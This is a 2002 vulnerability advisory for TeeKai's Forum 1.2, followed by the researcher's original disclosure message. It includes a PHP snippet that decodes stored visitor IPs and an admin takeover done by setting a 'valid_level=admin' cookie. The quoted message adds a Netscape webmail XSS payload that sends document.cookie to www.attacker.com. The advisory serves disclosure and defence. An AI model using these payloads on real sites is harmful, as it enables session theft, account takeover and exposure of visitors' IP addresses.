SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   TeeKai's Forum
Vendors:   Teekai
TeeKai's Forum Software Discloses Visitor IP Addresses to Remote Users and Allows Remote Authenticated Users to Gain Administrative Privileges
SecurityTracker Alert ID:  1004444
SecurityTracker URL:  http://securitytracker.com/id/1004444
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jun 4 2002
Impact:   Disclosure of user information, User access via network
Exploit Included:  Yes  
Version(s): 1.2
Description:   Several vulnerabilities were reported in TeeKai's Forum web bulletin board software. A remote user can determine the IP addresses of recent visitors to the affected web site and can gain administrative access to the application.

It is reported that TeeKai's Forum discloses the IP addresses of the web site visitors to remote users. The software stores the IP addresses of all visitors in a file (/data/member_log.txt) that can be accessed via the userlog.php script. The IP addresses are encoded using a weak encoding algorithm and can be readily decoded. Some example code to perform the decoding is provided:

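<?php
// $cryptedip is expected to hold one encoded dotted value from the log;
// it is not set anywhere in this snippet.
$cryptedip = explode('.',$cryptedip);
// The "key" is an MD5 hex digest, which PHP coerces to a number in arithmetic.
$key = md5("20");
$trueip = $cryptedip[0]/$key.".".$cryptedip[1]/$key.".".$cryptedip[2]/$key.".".$cryptedip[3]/$key;
echo "Result : $trueip";
?>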

According to the report, TeeKai's Forum allows a remote user to specify a certain cookie to gain administrative access to the forum. A remote user can set the "valid_level" cookie to "admin" instead of "user". The Forum apparently trusts the value of this cookie and no other authentication is performed.
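
The cookie flaw above comes down to reading an authorization level from client-controlled data. The following added example (not from the original advisory or from TeeKai's Forum; all function names and the secret are hypothetical) contrasts that pattern with a role value that the server signs with an HMAC and verifies before use.

```php
<?php
// Added example, not TeeKai's Forum code. Only the "valid_level" cookie name
// comes from the advisory; every function name and the secret are hypothetical.

// Pattern described in the advisory: the role is whatever the client sends.
function level_unsafe(array $cookies): string
{
    return $cookies['valid_level'] ?? 'guest';
}

// Hardened: the server issues the role bound to the username with an HMAC.
function issue_level(string $user, string $level, string $secret): string
{
    if (strpos($user, '|') !== false) {
        throw new InvalidArgumentException('username must not contain "|"');
    }
    $payload = $user . '|' . $level;
    return base64_encode($payload) . '.' . hash_hmac('sha256', $payload, $secret);
}

// Returns the verified role, or 'guest' for anything malformed or tampered.
function level_verified(array $cookies, string $secret): string
{
    $parts = explode('.', $cookies['valid_level'] ?? '', 2);
    if (count($parts) !== 2) {
        return 'guest';
    }
    $payload = base64_decode($parts[0], true);
    if ($payload === false
        || !hash_equals(hash_hmac('sha256', $payload, $secret), $parts[1])) {
        return 'guest';
    }
    $fields = explode('|', $payload);
    $level  = $fields[1] ?? '';
    return (count($fields) === 2 && in_array($level, ['user', 'admin'], true))
        ? $level : 'guest';
}

// Constructed sample values.
$secret = 'constructed-demo-secret-load-from-server-config';
$forged = ['valid_level' => 'admin'];
$issued = ['valid_level' => issue_level('alice', 'user', $secret)];

var_dump(level_unsafe($forged));             // client-chosen role is accepted
var_dump(level_verified($forged, $secret));  // rejected: no valid HMAC
var_dump(level_verified($issued, $secret));  // role the server actually issued
```

Keeping the level in a server-side session instead of a cookie removes the client-held value entirely.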

Impact:   A remote user can gain administrative access to the Forum.

A remote user can determine the IP addresses of recent visitors to the web site.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.teekai.info/basic/homepage.php?page=freestuffs&choose=webprogramming&cat=php&item=forum
Cause:   Access control error, Authentication error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Security holes in two Teekai's products + security hole in




Hi :)

Products :
**********
Tracking Online 1.0
Teekai's forum full 1.2
http://www.teekai.info

Problems :
**********
Tracking Online & Teekai's forum :
- Information recovery
- Information decoding
Teekai's forum :
- Admin access
- small holes
Tracking Online :
- XSS

Exploits :
**********
Forum & Tracking :
- PHP file to decode information :
<?
$cryptedip = explode('.',$cryptedip);
$key = md5("20");
$trueip = $cryptedip[0]/$key.".".$cryptedip[1]/$key.".".$cryptedip[2]/
$key.".".$cryptedip[3]/$key;
echo "Result : $trueip";
?>

Forum :
- /data/member_log.txt
- Setcookie "valid_level=admin"
- Setcookie "valid_username_online=[VALUE e.g. JScript ]"
- ...

Tracking Online :
- /data/userlog/log.txt
- /userlog.php
- ...

More details in French :
http://www.ifrance.com/kitetoua/tuto/Teekai.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%
2Fkitetoua%2Ftuto%2FTeekai.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII




There is a security hole in the mail service that Netscape proposes ( 
http://ncmail.netscape.com ).
It's making it possible to inject HTML in an e-mail... and this service 
authenticates by the cookies.

The hole consists in sending a mail with for subject a jscript preceded 
by : ";</script*> .

The idea would be a script of this kind on subject :
";</script*><form name=a*><input name=o 
value=http://www.attacker.com/script?*></form*>&lt;script*>window.open
(document.a.o.value+document.cookie)</script*>

without '*'.
I use <form> because " and ' are replaced by \" or \'.

Vendors were informed but did not repair.

Maybe more details soon...

Sorry for my poor English.

frog-m@n 


Copyright 2019, SecurityGlobal.net LLC